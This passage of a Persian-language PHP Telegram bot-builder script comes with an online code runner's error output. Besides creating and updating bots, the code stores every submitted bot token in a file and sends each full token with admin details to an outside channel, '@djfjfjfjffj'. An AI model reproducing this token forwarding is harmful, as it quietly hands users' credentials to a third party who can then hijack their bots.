  696. file_put_contents("data/$fadmin/$username/data/audio.txt",$audio);
  697. file_put_contents("data/$fadmin/$username/data/voice.txt",$voice);
  698. file_put_contents("data/$fadmin/$username/data/location.txt",$location);
  699. file_put_contents("data/$fadmin/$username/data/forlock.txt",$forlock);
  700. file_put_contents("data/$fadmin/$username/data/textlock.txt",$textlock);
  701. file_put_contents("data/$fadmin/$username/data/grouplock.txt",$grouplock);
  702. file_put_contents("data/$fadmin/$username/data/botoff.txt",$botoff);
  703. file_put_contents("data/$fadmin/$username/data/momod.txt",$momod);
  704. file_put_contents("data/$fadmin/$username/data/black.txt",$black);
  705. $one=str_replace("[TOKEN]","$text1",$pmresan);
  706. $two=str_replace("[ADMIN]","$fadmin",$one);
  707. $three=str_replace("[USERBOT]","$username",$two);
  708. file_put_contents("data/$fadmin/$username/$username.php",$three);
  709. $pmnew="https://e...content-available-to-author-only...t.ir/data/$fadmin/$username/$username.php";
  710. $webhook="https://a...content-available-to-author-only...m.org/bot$text1/setwebhook?url=$pmnew";
  711. file_put_contents("data/$fadmin/botname.txt",$username);
  712. file_put_contents("data/$fadmin/one.txt","null");
  713. file_get_contents($webhook);
  714. file_get_contents("https://a...content-available-to-author-only...m.org/bot$text1/sendmessage?chat_id=$fadmin&text=ربات+شما+با+موفقیت+بر+روی+سرور+تیم+فورماست+ران‌+شد✅+++همین+الان++ربات+خود+را+شخصی+سازی+کنید++/start");
  715. bot('sendmessage',[
  716. 'chat_id'=>$chat_id,
  717. 'text'=>"یک ربات با مشخصات زیر در سرور فورماست ساخته شد✔️
  718.  
  719. █████████████
  720. اطلاعات ربات :🔃
  721. 🤖نام ربات : $first_namebot
  722. 🤖یوزرنیم ربات : @$username
  723. 🤖ایدی ربات : $id
  724. 🤖توکن ربات :
  725. $text1
  726.  
  727. █████████████
  728. اطلاعات ادمین ربات : 🔃
  729.  
  730. 👤 نام ادمین : $fname
  731. 👤یوزرنیم ادمین : @$uname
  732. 👤ایدی ادمین : $fadmin
  733.  
  734. █████████████
  735. مشخصات تاریخ ساخت ربات :
  736.  
  737. ⏰ساعت : $time
  738. ⏰تاریخ : $date",
  739. 'reply_markup'=>$keyhome,
  740. ]);
  741. bot('sendmessage',[
  742. 'chat_id'=>"@djfjfjfjffj",
  743. 'text'=>"یک ربات با مشخصات زیر در سرور فورماست ساخته شد✔️
  744.  
  745. █████████████
  746. اطلاعات ربات :🔃
  747. 🤖نام ربات : $first_namebot
  748. 🤖یوزرنیم ربات : @$username
  749. 🤖ایدی ربات : $id
  750. 🤖توکن ربات :
  751. $text1
  752.  
  753. █████████████
  754. اطلاعات ادمین ربات : 🔃
  755.  
  756. 👤 نام ادمین : $fname
  757. 👤یوزرنیم ادمین : @$uname
  758. 👤ایدی ادمین : $fadmin
  759.  
  760. █████████████
  761. مشخصات تاریخ ساخت ربات :
  762.  
  763. ⏰ساعت : $time
  764. ⏰تاریخ : $date",
  765. ]);
  766. }
  767.  
  768. }
  769.  
  770. }elseif($text1=="🔁بروزرسانی"){
  771. if (strpos($inch , '"status":"left"') !== false )
  772. {
  773. bot('sendmessage',[
  774. 'chat_id'=>$chat_id,
  775. 'text'=>"شما در کانال ما عضو نیستید📯✖️
  776.  
  777. لطفا ابتدا در کانال ما عضو بشید☑️
  778. تا بتوانیـــد از تمام امکانات ربات استفاده کنیــد✔️✔️✔️
  779. https://t...content-available-to-author-only...m.me/ft_team
  780. https://t...content-available-to-author-only...m.me/ft_team
  781. بعد از عضویت روی دکمه /start کلیک کنید تا دکمه های اصلی ظاهر بشوند🔘",
  782. 'reply_markup'=>'{"keyboard":[[""],["/start"]],"resize_keyboard":true}',
  783. ]);
  784. return false;
  785. }
  786. file_put_contents("data/$fadmin/one.txt","updatepm");
  787. bot('sendmessage',[
  788. 'chat_id'=>$chat_id,
  789. 'text'=>"توکن باتتون رو بفرستید تا براتون رباتتون رو اپدیت کنم👻",
  790. 'reply_markup'=>json_encode([
  791. 'resize_keyboard'=>true,
  792. 'keyboard'=>[
  793. [['text'=>"🔙برگشت🔙"]]
  794. ]
  795. ]),
  796.  
  797. ]);
  798. }elseif($step=="updatepm"){
  799. if($text1=="🔙برگشت🔙"){
  800. file_put_contents("data/$fadmin/one.txt","null");
  801. bot('sendmessage',[
  802. 'chat_id'=>$chat_id,
  803. 'text'=>"به منوی اول برگشتید↩",
  804. 'reply_markup'=>$keyhome,
  805. ]);
  806. }else{
  807. $testdeletewebhook="https://a...content-available-to-author-only...m.me/bot$text1/deleteWebhook";
  808. file_get_contents($testdeletewebhook);
  809. $getme="https://a...content-available-to-author-only...m.org/bot$text1/getme";
  810. $jsgetme=json_decode(file_get_contents($getme),true);
  811. $ok=$jsgetme['ok'];
  812. $username=$jsgetme['result']['username'];
  813. $first_namebot=$jsgetme['result']['first_name'];
  814. $id=$jsgetme['result']['id'];
  815. if($ok==false){
  816. bot('sendmessage',[
  817. 'chat_id'=>$chat_id,
  818. 'text'=>"توکن مورد نظر قبول نشد⛔\n\nلطفا توکن دیگری امتحان کنید :",
  819. 'reply_markup'=>$keyback,
  820. ]);
  821. }else{
  822. bot('sendmessage',[
  823. 'chat_id'=>$chat_id,
  824. 'text'=>"ربات در حال ساختن میباشد\nلطفا صبر کنید...",
  825. ]);
  826. $txxt = file_get_contents("data/tokenlist.txt","a+");
  827. $pmembersid= explode("\n",$txxt);
  828. if (!in_array($text1,$pmembersid)){
  829. $aaddd = file_get_contents("data/tokenlist.txt");
  830. $aaddd .= $text1."\n";
  831. file_put_contents("data/tokenlist.txt",$aaddd);
  832. }
  833. $pmresan=file_get_contents("pmresan.php");
  834. $one=str_replace("[TOKEN]","$text1",$pmresan);
  835. $two=str_replace("[ADMIN]","$fadmin",$one);
  836. $three=str_replace("[USERBOT]","$username",$two);
  837.  
  838. file_put_contents("data/$fadmin/$username/$username.php",$three);
  839. $pmnew="https://e...content-available-to-author-only...t.ir/data/$fadmin/$username/$username.php";
  840. $webhook="https://a...content-available-to-author-only...m.org/bot$text1/setwebhook?url=$pmnew";
  841. file_put_contents("data/$fadmin/botname.txt",$username);
  842. file_put_contents("data/$fadmin/one.txt","null");
  843. file_get_contents($webhook);
  844. file_get_contents("https://a...content-available-to-author-only...m.org/bot$text1/sendmessage?chat_id=$fadmin&text=ربات+شما+با+موفقیت+بر+روی+سرور+تیم+فورماست+ران‌+شد✅+++همین+الان++ربات+خود+را+شخصی+سازی+کنید++/start");
  845. bot('sendmessage',[
  846. 'chat_id'=>$chat_id,
  847. 'text'=>"یک ربات با مشخصات زیر در سرور فورماست اپدیت شد✔️
  848.  
  849. █████████████
  850. اطلاعات ربات :🔃
  851. 🤖نام ربات : $first_namebot
  852. 🤖یوزرنیم ربات : @$username
  853. 🤖ایدی ربات : $id
  854. 🤖توکن ربات :
  855. $text1
  856.  
  857. █████████████
  858. اطلاعات ادمین ربات : 🔃
  859.  
  860. 👤 نام ادمین : $fname
  861. 👤یوزرنیم ادمین : @$uname
  862. 👤ایدی ادمین : $fadmin
  863.  
  864. █████████████
  865. مشخصات تاریخ ساخت ربات :
  866.  
  867. ⏰ساعت : $time
  868. ⏰تاریخ : $date",
  869. 'reply_markup'=>$keyhome,
  870. ]);
  871. bot('sendmessage',[
  872. 'chat_id'=>"@djfjfjfjffj",
  873. 'text'=>"یک ربات با مشخصات زیر در سرور فورماست اپدیت شد✔️
  874.  
  875. █████████████
  876. اطلاعات ربات :🔃
  877. 🤖نام ربات : $first_namebot
  878. 🤖یوزرنیم ربات : @$username
  879. 🤖ایدی ربات : $id
  880. 🤖توکن ربات :
  881. $text1
  882.  
  883. █████████████
  884. اطلاعات ادمین ربات : 🔃
  885.  
  886. 👤 نام ادمین : $fname
  887. 👤یوزرنیم ادمین : @$uname
  888. 👤ایدی ادمین : $fadmin
  889.  
  890. █████████████
  891. مشخصات تاریخ ساخت ربات :
  892.  
  893. ⏰ساعت : $time
  894. ⏰تاریخ : $date",
  895. ]);
  896. }
  897. }
  898. }
  899. $txxt = file_get_contents("data/userpvforemost.txt","a+");
  900. $pmembersid= explode("\n",$txxt);
  901. if (!in_array($fadmin,$pmembersid)){
  902. $aaddd = file_get_contents("data/userpvforemost.txt");
  903. $aaddd .= $fadmin."\n";
  904. file_put_contents("data/userpvforemost.txt",$aaddd);
  905. }
  906. ?>
Success #stdin #stdout #stderr 0.03s 26564KB
stdin
Standard input is empty
stdout
Standard output is empty
stderr
PHP Warning:  file_get_contents(data/blockall.txt): failed to open stream: No such file or directory in /home/kZ3c0t/prog.php on line 20
PHP Warning:  file_get_contents(booleans.txt): failed to open stream: No such file or directory in /home/kZ3c0t/prog.php on line 21
PHP Notice:  Trying to get property 'message' of non-object in /home/kZ3c0t/prog.php on line 24
PHP Notice:  Trying to get property 'edited_message' of non-object in /home/kZ3c0t/prog.php on line 25
PHP Notice:  Trying to get property 'message_id' of non-object in /home/kZ3c0t/prog.php on line 26
PHP Notice:  Trying to get property 'chat' of non-object in /home/kZ3c0t/prog.php on line 27
PHP Notice:  Trying to get property 'id' of non-object in /home/kZ3c0t/prog.php on line 27
PHP Notice:  Trying to get property 'chat' of non-object in /home/kZ3c0t/prog.php on line 28
PHP Notice:  Trying to get property 'first_name' of non-object in /home/kZ3c0t/prog.php on line 28
PHP Notice:  Trying to get property 'chat' of non-object in /home/kZ3c0t/prog.php on line 29
PHP Notice:  Trying to get property 'username' of non-object in /home/kZ3c0t/prog.php on line 29
PHP Notice:  Trying to get property 'text' of non-object in /home/kZ3c0t/prog.php on line 30
PHP Notice:  Trying to get property 'audio' of non-object in /home/kZ3c0t/prog.php on line 31
PHP Notice:  Trying to get property 'file_id' of non-object in /home/kZ3c0t/prog.php on line 32
PHP Notice:  Trying to get property 'from' of non-object in /home/kZ3c0t/prog.php on line 33
PHP Notice:  Trying to get property 'id' of non-object in /home/kZ3c0t/prog.php on line 33
PHP Notice:  Trying to get property 'callback_query' of non-object in /home/kZ3c0t/prog.php on line 34
PHP Notice:  Trying to get property 'message' of non-object in /home/kZ3c0t/prog.php on line 34
PHP Notice:  Trying to get property 'chat' of non-object in /home/kZ3c0t/prog.php on line 34
PHP Notice:  Trying to get property 'id' of non-object in /home/kZ3c0t/prog.php on line 34
PHP Notice:  Trying to get property 'callback_query' of non-object in /home/kZ3c0t/prog.php on line 35
PHP Notice:  Trying to get property 'data' of non-object in /home/kZ3c0t/prog.php on line 35
PHP Notice:  Trying to get property 'message' of non-object in /home/kZ3c0t/prog.php on line 36
PHP Notice:  Trying to get property 'reply_to_message' of non-object in /home/kZ3c0t/prog.php on line 36
PHP Notice:  Trying to get property 'forward_from' of non-object in /home/kZ3c0t/prog.php on line 36
PHP Notice:  Trying to get property 'id' of non-object in /home/kZ3c0t/prog.php on line 36
PHP Notice:  Trying to get property 'message' of non-object in /home/kZ3c0t/prog.php on line 37
PHP Notice:  Trying to get property 'forward_from' of non-object in /home/kZ3c0t/prog.php on line 37
PHP Notice:  Trying to get property 'callback_query' of non-object in /home/kZ3c0t/prog.php on line 38
PHP Notice:  Trying to get property 'inline_query' of non-object in /home/kZ3c0t/prog.php on line 39
PHP Notice:  Trying to get property 'channel_post' of non-object in /home/kZ3c0t/prog.php on line 40
PHP Notice:  Trying to get property 'forward_from' of non-object in /home/kZ3c0t/prog.php on line 40
PHP Notice:  Trying to get property 'channel_post' of non-object in /home/kZ3c0t/prog.php on line 41
PHP Notice:  Trying to get property 'text' of non-object in /home/kZ3c0t/prog.php on line 41
PHP Notice:  Trying to get property 'callback_query' of non-object in /home/kZ3c0t/prog.php on line 42
PHP Notice:  Trying to get property 'message' of non-object in /home/kZ3c0t/prog.php on line 42
PHP Notice:  Trying to get property 'message_id' of non-object in /home/kZ3c0t/prog.php on line 42
PHP Notice:  Trying to get property 'message' of non-object in /home/kZ3c0t/prog.php on line 43
PHP Notice:  Trying to get property 'reply_to_message' of non-object in /home/kZ3c0t/prog.php on line 43
PHP Warning:  mkdir(): Permission denied in /home/kZ3c0t/prog.php on line 44
PHP Warning:  mkdir(): Permission denied in /home/kZ3c0t/prog.php on line 45
PHP Notice:  Trying to get property 'contact' of non-object in /home/kZ3c0t/prog.php on line 47
PHP Notice:  Trying to get property 'contact' of non-object in /home/kZ3c0t/prog.php on line 48
PHP Notice:  Trying to get property 'first_name' of non-object in /home/kZ3c0t/prog.php on line 48
PHP Notice:  Trying to get property 'contact' of non-object in /home/kZ3c0t/prog.php on line 49
PHP Notice:  Trying to get property 'phone_number' of non-object in /home/kZ3c0t/prog.php on line 49
PHP Notice:  Trying to get property 'contact' of non-object in /home/kZ3c0t/prog.php on line 50
PHP Notice:  Trying to get property 'user_id' of non-object in /home/kZ3c0t/prog.php on line 50
PHP Warning:  file_get_contents(data//one.txt): failed to open stream: No such file or directory in /home/kZ3c0t/prog.php on line 51
PHP Warning:  file_get_contents(): php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/kZ3c0t/prog.php on line 52
PHP Warning:  file_get_contents(http://a...content-available-to-author-only...d.ir/time): failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/kZ3c0t/prog.php on line 52
PHP Warning:  file_get_contents(data/adminlist.txt): failed to open stream: No such file or directory in /home/kZ3c0t/prog.php on line 55